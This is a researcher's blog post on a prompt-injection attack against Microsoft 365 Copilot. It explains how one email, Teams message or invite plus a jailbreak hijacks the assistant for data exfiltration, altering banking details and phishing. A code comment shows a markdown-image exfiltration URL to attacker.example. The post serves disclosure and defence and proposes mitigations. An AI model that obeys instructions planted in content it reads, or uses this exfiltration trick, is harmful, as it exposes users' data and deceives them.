
Copilot Vulnerable to RCE: A New Attack Vector Into The Enterprise

We Need To Address Promptware Now

Give Me the Bottom Lines

M365 Copilot is vulnerable to ~RCE (Remote Copilot Execution). The vulnerability allows an external attacker to take full control over your Copilot. They can search for and analyze sensitive data on your behalf (your email, Teams, SharePoint, OneDrive, and calendar, by default), execute plugins for impact and data exfiltration, control every character that Copilot writes back to you, and manipulate Copilot’s references for social engineering. To perform this attack, the attacker needs no prior access to or knowledge of your systems. They only need to send you a single email, Teams message or calendar invite, which you do not even have to open. The attack is not mitigated or detected by Microsoft’s existing security controls, including E5, Purview and Prompt Shield (true as of Aug 11th, 2024). We’ve followed responsible disclosure and are still working directly with Microsoft to apply mitigations (see comment by Microsoft spokespeople). To see it in action, check out our demos.

What Readers Can Expect of This Article

In this article I attempt to clarify the implications of the ~RCE vulnerability we presented last week at BHUSA in a talk titled Living off Microsoft Copilot. This research is getting a lot of attention and there are many misconceptions, so I’m offering this post as an authoritative source. The talk covered Living-off-the-Land techniques as well, but I will cover those in a separate post for clarity. I also gave another talk titled 15 Ways to Break Your Copilot, which I’ll cover in a separate post too. This article is written for everyone in cybersecurity, from executives to practitioners; it is not a technical writeup. I will focus on the ~RCE vulnerability, the new capabilities attackers gain through Copilot, and what we should do about it.


A Primer on Microsoft Copilot

Why Microsoft Copilot is so Important

There are many AI apps out there, but there’s only one being adopted by the world’s largest enterprises. At the pace of a startup. You normally wouldn’t expect a large bank or government agency to adopt bleeding edge technology. But that’s exactly what’s happening with Copilot.

At the same time, we’re still learning how to build secure AI apps. New vulnerability categories are being discovered and secure design patterns are still emerging. The AI rush means that we have no buffer before these newly discovered vulnerabilities lead to an impact on the enterprise.

This combination of things is what drove us to focus on Microsoft Copilot.

How Copilot Works

The Orchestrator and Just-In-Time Apps

A ‘normal’ application can do exactly what its developers allowed it to do, no more, no less. Unintended behavior is common (i.e. bugs or security vulnerabilities), but even that behavior is coded into the app. AI apps are different; they do not have every possible execution path written out explicitly. Instead, they are granted a collection of capabilities which they can call and compose ‘at will’. Think of a list of functions like search_enterprise_data(query), search_web(query), send_email(to, cc, subject, content). Each function might have parameters that need to be passed. The AI can use each function zero or more times, and can also compose these functions and pass data from one to the other. The component of the AI app that is in charge of selecting and composing capabilities is typically called The Orchestrator. The word ‘The’ here is misleading. This is typically not one but many different components, which do no more than prompt an LLM with templated formats and call code-based functions based on the LLM’s response.

A useful way to think about it is that AI creates Just-In-Time Applications to respond to a user prompt. Those applications are written, run and then disposed of, all in the context of one user prompt. The components available to the AI app are used as building blocks. The user’s prompt is used as the spec. The Orchestrator combines the two into a JiT app, which is then executed, its results analyzed by an LLM, and served to the user. JiT apps end up looking very much like no-code automations: a series of building blocks executed one after the other. This is not an accurate representation of what actually happens, since JiT apps aren’t written in code. But the abstraction helps us reason about what’s going on, and suggests what could go wrong and why.
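To make the abstraction concrete, here is a minimal, hypothetical sketch of an orchestrator loop. The capability names, the plan format and the stub LLM call are illustrative assumptions, not Copilot’s actual internals; the point is only that the LLM chooses which building blocks run and what data flows between them.

```python
# Toy orchestrator sketch (illustrative only; not Copilot's real design).
# An LLM turns a user prompt into a "Just-In-Time app": an ordered plan of
# capability calls, which the orchestrator then executes with real code.

from typing import Callable

# Building blocks the AI is allowed to compose. Names are hypothetical.
CAPABILITIES: dict[str, Callable[..., str]] = {
    "search_enterprise_data": lambda query: f"<graph results for {query!r}>",
    "search_web": lambda query: f"<bing results for {query!r}>",
    "send_email": lambda to, cc, subject, content: f"<sent mail to {to}>",
}

def plan_with_llm(user_prompt: str, context: str) -> list[dict]:
    """Stand-in for the LLM call: returns an ordered list of capability
    invocations. Crucially, anything in `context` (including an
    attacker-supplied email) can influence the plan that comes back."""
    return [
        {"capability": "search_enterprise_data", "args": {"query": user_prompt}},
    ]

def run_jit_app(user_prompt: str, retrieved_context: str) -> list[str]:
    """Execute the JiT app: run each chosen building block in order."""
    results = []
    for step in plan_with_llm(user_prompt, retrieved_context):
        func = CAPABILITIES[step["capability"]]
        results.append(func(**step["args"]))
    return results

if __name__ == "__main__":
    print(run_jit_app("summarize my email", retrieved_context="<inbox contents>"))
```

Note how the retrieved context feeds directly into planning; that coupling between data and instructions is exactly what the rest of this article exploits.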

Copilot’s Built-In Capabilities

Copilot for M365 comes built in with the following capabilities. It can search the enterprise graph, which is the AI-equivalent of using Microsoft’s Enterprise Search. This grants access to your emails, Teams messages, calendar invites, contacts, SharePoint sites and OneDrive files. It can also search the web through Bing Search, the AI-equivalent of using Bing yourself. Note that AI can only view the information Bing has about search results and cannot visit those websites directly. For a human, that would mean being able to search Bing and read previews, but not click any link out of the results. Copilot can also print out references to files or web content, which reduce hallucination and make its responses credible. References are also the basis of the key security mechanism for Copilot, sensitivity labels.

Copilot’s knowledge base can be extended with Graph Connectors, with common scenarios including file systems, ITSM, ERP and CRM. Once set up, Copilot will search through these extensions alongside your M365 instance, again through enterprise search.

Copilot Plugins

With a few clicks, users can create and share new capabilities for Microsoft Copilot. They can choose from tens of thousands of existing operations supported by the Power Platform, or write their own connectors. These can write emails, delete files, generate security tokens, connect to on-prem systems, change your Salesforce CRM and so much more. Plugins are created with Copilot Studio and present many challenges to build securely, which I’ve covered in a separate BHUSA talk titled 15 Ways to Break Your Copilot. On top of those risks intrinsic to Copilot Studio, plugins give Copilot the ability to act on your behalf.

A New Vulnerability Class: ~RCE (Remote Copilot Execution)

An RCE (Remote Code Execution) has three things that make it meaningful. First, an attacker needs to be able to inject data from an external source, which is where ‘Remote’ comes from. Second, that data needs to be interpreted as instructions; in RCEs that means the data is wrongfully read as code for the application to run, hence ‘Code Execution’. Third, for the RCE to have an impact, that code must be able to do something impactful, like exfiltrate sensitive data or delete a record.

An ~RCE (Remote Copilot Execution) accomplishes the same thing, adjusted to AI apps. It doesn’t matter whether it’s an app written in code or a Just-In-Time app written in the English language by AI; the impact of an ~RCE is the same.

| | Remote Code Execution (RCE) | Remote Copilot Execution (~RCE) |
| --- | --- | --- |
| Remote | External party can inject data into the application context | External party can inject data into the application context |
| Code Execution | Data interpreted as code | Data interpreted as LLM instructions |
| Impactful | App code can perform impactful operations | AI capabilities can perform impactful operations |

~RCE in Microsoft Copilot

Our research demonstrates a full ~RCE vulnerability in Microsoft Copilot for M365. Remote injection of data is accomplished via a simple email, Teams message, or calendar invite. Code execution is accomplished with a jailbreak. Impact is accomplished with enterprise search, social engineering and plugin execution.

~RCEs are an application security vulnerability, not an LLM vulnerability. They stem from the way the AI app is built, how it combines code, capabilities and LLM prompts, and how it interacts with its environment.

A Way In

When you ask Copilot to ‘summarize my email’ (the first template Microsoft suggests), Copilot must read your email. Our way in, then, is simply to send you an email. This way, whenever Copilot decides to read your email, it will find our malicious email as well. The same technique works via Teams messages (Copilot can read external messages even if the user hasn’t accepted them) and calendar invites.

This means the attack has to be somewhat surgical: an attacker needs to guess in advance what the victim will ask Copilot, in order to send the right email. That turns out to be very easy, of course, given Microsoft’s helpful prompt templates. Note that the attacker doesn’t need the word-for-word prompt the victim is going to use, only a high-level understanding of the question.

Jailbreak

Once our malicious content enters Copilot’s context, we need to convince Copilot that it contains new instructions. These instructions must override the system message, the victim’s question, and any security mechanism Microsoft has implemented. Tamir wrote a brilliant blog series about that, which I encourage you to read for the details, including the payloads. With the jailbreak in place, we fully control every decision Copilot makes about using capabilities, every character it outputs and every reference it cites.

There is nothing special about the jailbreak we used. Once Microsoft deny-lists it, finding another one or permuting the existing one would take a few minutes on average and a few hours at most. If you’re skeptical, or believe that the more advanced models just around the corner will ‘fix it’, check out the jailbreaking community. According to them, more advanced models become easier to break due to their extended attack surface.

Trying to enumerate jailbreaks is a moot project, doomed to fail. It didn’t work for malware, and it sure isn’t going to work for human language.

A Way Out or a Way to Impact

Once we’re in, what can we do? Well, we can do anything Copilot can do. If you’ve got a plugin enabled which can send data elsewhere, your data is now mine. If you’ve got browsing enabled, I can exfiltrate data through the choice of search. And in all cases, I can use Copilot to manipulate you.

Here are the capabilities we have demonstrated:

  1. Data exfiltration - getting Copilot to search for, analyze and exfiltrate sensitive data via Bing search results [video]

  2. Hijacking a financial transaction - getting Copilot to manipulate banking information while keeping original file references for trustworthiness [video]

  3. Phishing with Copilot as a malicious insider - getting Copilot to lure its users to our malicious phishing website [video]

Collaboration With Microsoft

Responsible Disclosure

We have gone through Responsible Disclosure and have been working directly with the Microsoft team to clarify findings and drive fixes where possible. MSRC and Microsoft internal security teams have been highly engaged, and we have an ongoing collaboration. Our experience working with Microsoft on these findings has been very positive. See comment by Microsoft spokespeople.

Microsoft’s Responsibility

Our research showed that Microsoft has indeed put significant effort into trying to secure Copilot. We identified 10 different security mechanisms, though they all fail to prevent this attack. We expect Microsoft to continue to invest heavily in this space. But as mentioned above, ~RCEs will not be ‘solved’ and this problem is not going anywhere. Like everything in cybersecurity, there is a Shared Responsibility here, and that is even more important when we’re talking about plugins. Own your risk.

Microsoft does deserve criticism for lack of observability. Microsoft Copilot is a black box. Customers cannot monitor it properly without buying another monitoring product that only Microsoft can sell. Third-party security vendors must reverse engineer Copilot to figure out how to secure it, introducing bad tradeoffs. The orchestrator is a mystery. The only thing we get is a meaningless marchitecture. Such an important piece of software, embedded in the heart of every major enterprise in the world, must be observable by all, not just by the internal Microsoft teams building add-on security products.

Implications

The implications of this research go well beyond Microsoft Copilot; they apply to any AI app that wants to be useful. I offer four main takeaways:

There is No Free Lunch

Once you give AI access to data, which is the very thing that makes it useful, you’ve introduced an attack surface for ~RCEs. ~RCEs are a fundamental issue with AI apps; they are not going away. This is a cat-and-mouse game we’ll continue to play as long as AI apps don’t have a strong boundary between data and instructions.

Treat AI Apps Like Experimental Drugs

The cybersecurity and developer communities are still learning how to build secure AI applications. New vulnerability classes are still being discovered, and mitigations are still being tried out.

One example is Johann Rehberger’s work on data exfiltration through markdown images. Thanks to Johann, we now know that letting AI apps render images at will is a serious anti-pattern. Once an attacker gets an ~RCE, rendering an image allows them to exfiltrate data without any user clicks. The common mitigations are setting a Content Security Policy or disabling markdown rendering entirely. Yet, because Copilot has been adopted by the enterprise so quickly, we are learning of these mitigations while already being widely vulnerable.
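For intuition, here is a minimal sketch of the anti-pattern and of the CSP mitigation. The attacker domain, the header value and the helper function below are hypothetical; the mechanism, a rendered image URL carrying data out until a restrictive policy blocks it, is the point.

```python
# Illustrative only: why auto-rendered markdown images are an exfiltration channel.
# A prompt-injected model can be made to output markdown such as:
#   ![logo](https://attacker.example/collect?d=<encoded sensitive data>)
# If the chat client renders the image automatically, the browser issues a GET
# request carrying the data to attacker.example, with no user click required.

# One common mitigation: a Content-Security-Policy that only allows images
# from origins you trust (the value below is an assumed example).
CSP_VALUE = "default-src 'self'; img-src 'self' https://cdn.trusted.example"

def add_csp_header(headers: dict[str, str]) -> dict[str, str]:
    """Attach a restrictive CSP so off-origin image loads are blocked by the browser."""
    headers["Content-Security-Policy"] = CSP_VALUE
    return headers

# The stricter alternative mentioned above: do not render markdown or images at all.
```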

AI is amazing, and we all want to use it as much as we can to boost our productivity. So there are good reasons to take the risk, just as with experimental drugs. But if you enter a drug trial, you do your own risk assessment. Defenders, you must own your own risk; nobody, including Microsoft, will own it for you.

Beware the Devil You Know (Reinvigorated Access Control Won’t Save Us)

Our collective conversation about Microsoft Copilot and ChatGPT has been FUD-based. As a result, we’ve developed collective tunnel vision, focusing on the Devil We Know instead of the new threat surface that AI apps introduce: ~RCEs.

First, we were all worried about employees pasting data into ChatGPT. Then, we were worried about Microsoft Copilot helping employees find sensitive data they unknowingly have access to. Don’t get me wrong, these are important topics. But they have nothing to do with AI. Employees pasting data into untrusted sources is an issue we’ve been trying to mitigate for years, first with network-based proxies and lately with browser extensions. Employees snooping around for sensitive information is also an old problem; consider how many of us were worried about Enterprise Search, which can reveal the same sensitive results. Access controls and solutions that help with the application of PoLP (the Principle of Least Privilege) have been with us for years, and we will probably continue to struggle with applying them.

The new attack vector that AI apps bring into the enterprise is ~RCEs. An attacker sends an email and can act on behalf of your account. No account compromise needed.

Implement Emerging Design Patterns Quickly, Or Else

If you’re building an AI app, follow the design patterns identified by the community. These don’t eliminate the problem, but they cut down on its sharp edges. Of course, they also reduce the usability of your app. The choice is up to you.

  1. Don’t have your clients render Markdown, HTML, images or links (limit data exfiltration).

  2. If you must enable any of the above, enforce a Content Security Policy (limit data exfiltration).

  3. Require user consent for sensitive capabilities (limit impact); see the sketch after this list.

  4. Don’t bake user identities into plugins (limit privilege escalation).

  5. Build observability into your AI bot (so security vendors don’t have to proxy your bot to build an inline control).
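As an example of pattern 3, here is a minimal, hypothetical consent gate an orchestrator could place in front of impactful capabilities. The capability names and the classification of what counts as ‘sensitive’ are assumptions for illustration, not a description of any existing product.

```python
# Sketch of a consent gate for sensitive capabilities (illustrative only).
# Read-only lookups run freely; anything that sends data out or mutates
# state requires an explicit confirmation from the human user.

SENSITIVE_CAPABILITIES = {"send_email", "delete_file", "update_crm_record"}  # assumed names

def ask_user_to_confirm(capability: str, args: dict) -> bool:
    """Stand-in for a real UI prompt shown to the end user."""
    answer = input(f"Allow {capability} with {args}? [y/N] ")
    return answer.strip().lower() == "y"

def execute_with_consent(capability: str, args: dict, registry: dict) -> str:
    """Run a capability only if it is non-sensitive or the user consents."""
    if capability in SENSITIVE_CAPABILITIES and not ask_user_to_confirm(capability, args):
        return f"{capability} blocked: user did not consent"
    return registry[capability](**args)
```

The tradeoff is the one noted above: every consent prompt costs usability, which is why such gates tend to be scoped to the most impactful operations.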

Promptware: The Missing Piece and A Way Forward

We’re clearly not in a good state right now. What could be the way forward?

Consider how infosec handles the threat of malware. Could you imagine an attacker sending files to one of your enterprise users without having malware mitigation in place? Well, of course you can; we do have a ransomware pandemic. But your organization likely invests significant resources to ensure that doesn’t happen. Every file that hits your enterprise gets scanned, whether it arrives through email, SharePoint, or direct user download.

The collective cybersecurity community has invested heavily in identifying and curtailing malware, from AVs to EDRs and detonation chambers. Today’s EDRs embed themselves deep into the OS so they can fight malware and prevail. EDRs focus on bad behavior rather than enumerating bad hashes, getting an accurate measurement of those behaviors from the OS. They also act natively within the OS to curtail malware when it is identified, essentially living off the land and using it for good.

But what about promptware, content carrying hidden malicious instructions? This is a new category of malicious content, and we’re doing nothing to prevent it from entering the enterprise. An email containing hidden instructions, sent from a random person on the Internet, should not be brought into Copilot’s context. Especially not if that context can be freely escalated, through prompt injection, to collect more sensitive content or perform operations.

This term is useful because it comes preloaded with expectations about ownership, process, technical controls, mitigations, and tradeoffs. It also clarifies that we won’t solve the threat of promptware, but rather manage it. Playing a never-ending cat and mouse game.

Finally, the term reminds us of the severity of this attack vector and the necessity of covering it: addressing promptware requires the same level of scrutiny we apply to malware.

We can take lessons learned from combating malware and apply them to promptware. The shift from AVs to EDRs tells us that we should focus on Copilot’s behavior under the influence of promptware, rather than on enumerating jailbreaks (which, as mentioned above, is a moot project anyway). The effort that EDRs put into accurate measurement through intimate knowledge of the OS tells us that we need to develop independent observability of Copilot through intimate knowledge of M365. The R in EDR, clearly exemplified by active ransomware protection capabilities deeply embedded into the OS, teaches us that we must build active defensive measures deeply embedded into business applications. The OS is the battleground for fighting malware. Business applications, M365 first and foremost, are the battleground for fighting promptware.
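To make the ‘behavior over signatures’ idea concrete, here is a hypothetical sketch of a behavioral rule rather than a jailbreak blocklist. The event fields and the specific rule (untrusted external content ingested, then an exfiltration-capable capability invoked) are assumptions for illustration, not a description of any existing product.

```python
# Sketch of behavior-based detection for promptware (illustrative only).
# Instead of enumerating jailbreak strings, watch what the copilot *does*:
# flag sessions where untrusted external content was pulled into context
# and an exfiltration-capable capability was then invoked.

from dataclasses import dataclass

EXFIL_CAPABLE = {"search_web", "send_email", "http_request"}  # assumed capability names

@dataclass
class CopilotEvent:
    kind: str        # "context_ingested" or "capability_invoked"
    source: str      # e.g. "external_email", "sharepoint", "user_prompt"
    capability: str = ""

def flag_suspicious_session(events: list[CopilotEvent]) -> bool:
    """Return True if external content entered the context before an
    exfiltration-capable capability was used in the same session."""
    tainted = False
    for event in events:
        if event.kind == "context_ingested" and event.source == "external_email":
            tainted = True
        if event.kind == "capability_invoked" and event.capability in EXFIL_CAPABLE and tainted:
            return True
    return False
```

Getting trustworthy events like these is exactly the observability gap called out above; without them, any such rule runs blind.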

This has massive implications for the kind of security controls we can expect to work. Treating Copilot as just another AI app, scanning its inputs and outputs for a list of bad words, will not protect us against promptware leading to ~RCEs. It’s like trying to fight malware without understanding the OS the malware is targeting: noisy and ultimately irrelevant. Instead, we must invest in Detection and Response for AI apps, grounded in the ecosystems in which they operate, developing deeply integrated observability and counter-measures for promptware. Securing copilots means instrumenting the business applications underneath Microsoft Copilot, Gemini and ChatGPT Enterprise, and the developer ecosystem around GitHub for GitHub Copilot.
